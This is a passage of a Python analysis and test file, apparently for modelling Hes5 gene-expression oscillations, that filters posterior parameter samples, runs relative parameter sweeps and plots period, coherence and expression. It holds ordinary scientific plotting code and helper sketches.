# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_sweep_parameters = my_posterior_samples[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
# this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
this_axis.set_ylim(0,0.25)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_low_transcription_coherence_increases_' + parameter_name + '.pdf'))
def xest_plot_pairplot_for_coherence_increase(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = my_posterior_samples[other_accepted_indices]
#
# model_results = accepted_model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
my_parameter_sweep_results[:,9,4]*1.2,
np.logical_and(my_parameter_sweep_results[:,9,4] < 0.2,
my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
#
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,10,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2,
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.15))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
#
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_sweep_parameters = my_posterior_samples[increase_indices]
try:
my_pairplot = hes5.plot_posterior_distributions(my_sweep_parameters)
my_pairplot.axes[-1,0].set_xlim(0,4)
# plt.style.use('classic')
my_pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output',
'pairplot_low_transcription_coherence_increase_' + parameter_name + '.pdf'))
except Exception:
print('could not pairplot ' + parameter_name)
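# hes5.plot_posterior_distributions is used above as a pair plot whose .axes
# grid and .savefig are accessed afterwards; a seaborn PairGrid behaves the
# same way. A hypothetical stand-in (the column names are assumptions, not
# the hes5 module's actual implementation):
def plot_posterior_distributions_sketch(parameter_samples):
    import pandas as pd
    import seaborn as sns
    column_names = ['transcription rate', 'translation rate',
                    'repression threshold', 'transcription delay']
    frame = pd.DataFrame(parameter_samples[:,:4], columns = column_names)
    return sns.pairplot(frame) # a PairGrid with .axes and .savefig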
def xest_plot_traces_for_repression_threshold_decrease(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription' +
'repression_threshold.npy'))
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
my_parameter_sweep_results[:,4 ,4],
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
np.logical_and(my_parameter_sweep_results[:,4,4] >
my_parameter_sweep_results[:,9,4]*8,
np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,4,4] > 0.2))))
#
my_posterior_results = accepted_model_results[increase_indices] # index the accepted results, which align with the sweep rows
my_posterior_samples = my_posterior_samples[increase_indices]
number_of_traces = 10
figuresize = (6,9)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(3, 3 )
repression_threshold_percentages = [1.0, 0.5, 0.25] # one figure row per ratio
y_limits = [[4,8],
[2,6],
[0,4]]
for figure_row_index, repression_threshold_percentage in enumerate(repression_threshold_percentages):
for parameter_index in range(3):
this_double_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[figure_row_index*3 + parameter_index],
height_ratios= [number_of_traces, 1])
this_inner_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(number_of_traces, 1,
subplot_spec=this_double_grid[0], hspace=0.0)
this_parameter = my_posterior_samples[parameter_index]
this_results = my_posterior_results[parameter_index]
_, these_traces = hes5.generate_multiple_langevin_trajectories(number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2]*
repression_threshold_percentage,
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2]*
repression_threshold_percentage,
hill_coefficient = this_parameter[4], # match the example traces below
equilibration_time = 1000)
this_power_spectrum, this_coherence, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces)
for subplot_index in range(number_of_traces):
this_axis = plt.Subplot(my_figure, this_inner_grid[subplot_index])
my_figure.add_subplot(this_axis)
this_trace = hes5.generate_langevin_trajectory(
duration = 1500,
repression_threshold = this_parameter[2]*
repression_threshold_percentage,
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2]*
repression_threshold_percentage,
hill_coefficient = this_parameter[4],
equilibration_time = 1000)
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.ylim(y_limits[figure_row_index])
# this_axis.locator_params(axis='y', tight = True, nbins=1)
# this_axis.locator_params(axis='y', nbins=2)
this_axis.locator_params(axis='x', tight = True, nbins=3)
plt.yticks([])
this_axis.tick_params(axis='both', length = 1)
if subplot_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_coherence) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 5)
if subplot_index < number_of_traces - 1:
this_axis.xaxis.set_ticklabels([])
if parameter_index !=0:
this_axis.yaxis.set_ticklabels([])
if parameter_index == 0 and subplot_index == 5:
plt.ylabel('Expression/1e4', labelpad = 15)
plt.xlabel('Time [min]', labelpad = 2)
plt.yticks(y_limits[figure_row_index])
this_axis = plt.Subplot(my_figure, this_double_grid[1])
my_figure.add_subplot(this_axis)
plt.xlabel('Frequency [1/min]', labelpad = 2)
plt.plot(this_power_spectrum[:,0], this_power_spectrum[:,1])
this_axis.locator_params(axis='x', tight = True, nbins=3)
this_axis.tick_params(axis='both', length = 1)
if parameter_index == 0:
plt.ylabel('Power', labelpad = 15)
max_index = np.argmax(this_power_spectrum[:,1])
max_power_frequency = this_power_spectrum[max_index,0]
left_frequency = max_power_frequency*0.9
right_frequency = max_power_frequency*1.1
plt.axvline(left_frequency, color = 'black')
plt.axvline(right_frequency, color = 'black')
plt.xlim(0.0,0.01)
plt.yticks([])
plt.axhline(3)
plt.figtext(0.5,0.98,r'Repression threshold ratio at 1.0', fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.65,r'Repression threshold ratio at 0.5', fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.32,r'Repression threshold ratio at 0.25', fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.tight_layout()
my_figure.subplots_adjust(hspace = 0.5)
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','repression_threshold_decrease.pdf'))
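# The vertical lines at 0.9 and 1.1 times the peak frequency in the power
# spectrum panels above suggest that coherence is the fraction of spectral
# power within +/-10% of the peak. A minimal sketch of that definition,
# assuming the (frequency, power) column layout of the plotted spectra; the
# actual computation lives in hes5.calculate_power_spectrum_of_trajectories.
def coherence_and_period_sketch(power_spectrum):
    import numpy as np
    frequencies = power_spectrum[:,0]
    power = power_spectrum[:,1]
    peak_frequency = frequencies[np.argmax(power)]
    in_band = np.logical_and(frequencies >= 0.9*peak_frequency,
                             frequencies <= 1.1*peak_frequency)
    coherence = (np.trapz(power[in_band], frequencies[in_band])/
                 np.trapz(power, frequencies))
    period = 1.0/peak_frequency # minutes, if frequencies are in 1/min
    return coherence, period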
def xest_plot_low_transcription_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_parameter_sweeps_hill_low_transcription' + parameter_name + '.npy'))
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','low_transcription_sweep_' + parameter_name + '.pdf'))
def xest_plot_heterozygous_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_heterozygous_sweeps_' + parameter_name + '.npy'))
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_sweep_' + parameter_name + '.pdf'))
def xest_make_relative_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_relative_parameter_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
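# With relative = True the sweep presumably rescales each parameter around its
# posterior value. A hypothetical sketch of that grid: with 20 points from
# 0.1x to 2.0x, index 9 is the unchanged value (1.0x) and indices 4 and 14 are
# 0.5x and 1.5x, which is consistent with how the sweep results are indexed in
# the plotting routines of this file (an assumption, not the actual
# implementation in hes5.conduct_all_parameter_sweeps_at_parameters).
def relative_sweep_values_sketch(parameter_value, number_of_parameter_points = 20):
    import numpy as np
    relative_values = np.linspace(0.1, 2.0, number_of_parameter_points)
    return relative_values*parameter_value
# For example, a translation rate of 29/min would be swept through
# relative_sweep_values_sketch(29.0)[[4, 9, 14]] -> [14.5, 29.0, 43.5]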
def xest_plot_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_parameter_sweeps_' + parameter_name + '.npy'))
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_' + parameter_name + '.pdf'))
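# The same three-panel figure (period, coherence and mean expression against
# the swept parameter) is rebuilt in several methods of this file. Below is a
# standalone sketch of the shared pattern, with the column layout assumed as
# before and the error bars of the expression panel omitted for brevity; the
# helper name is hypothetical.
def plot_three_panel_sweep_sketch(sweep_results, x_label, filename):
    import numpy as np
    import matplotlib.pyplot as plt
    figure = plt.figure(figsize = (6.5, 1.5))
    panels = [(3, 'Period [min]', (0, 700)),
              (4, 'Coherence', (0, 1)),
              (1, 'Expression/1e4', (0, 15))]
    for panel_index, (column, y_label, y_limits) in enumerate(panels):
        this_axis = figure.add_subplot(1, 3, panel_index + 1)
        for results_table in sweep_results:
            y_values = results_table[:,column]
            if column == 1:
                y_values = y_values/10000 # expression is stored in molecule numbers
            this_axis.plot(results_table[:,0], y_values, color = 'black', alpha = 0.05)
        this_axis.locator_params(axis = 'x', tight = True, nbins = 4)
        this_axis.set_xlabel(x_label)
        this_axis.set_ylabel(y_label)
        this_axis.set_ylim(y_limits)
    figure.tight_layout()
    figure.savefig(filename)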
def xest_plot_relative_parameter_variation_differently(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = accepted_model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_parameter_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_low_coherence_' + parameter_name + '.pdf'))
def xest_plot_relative_parameter_variation_coherence_increase(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = accepted_model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
reference_indices['mRNA_degradation_rate'] = 15
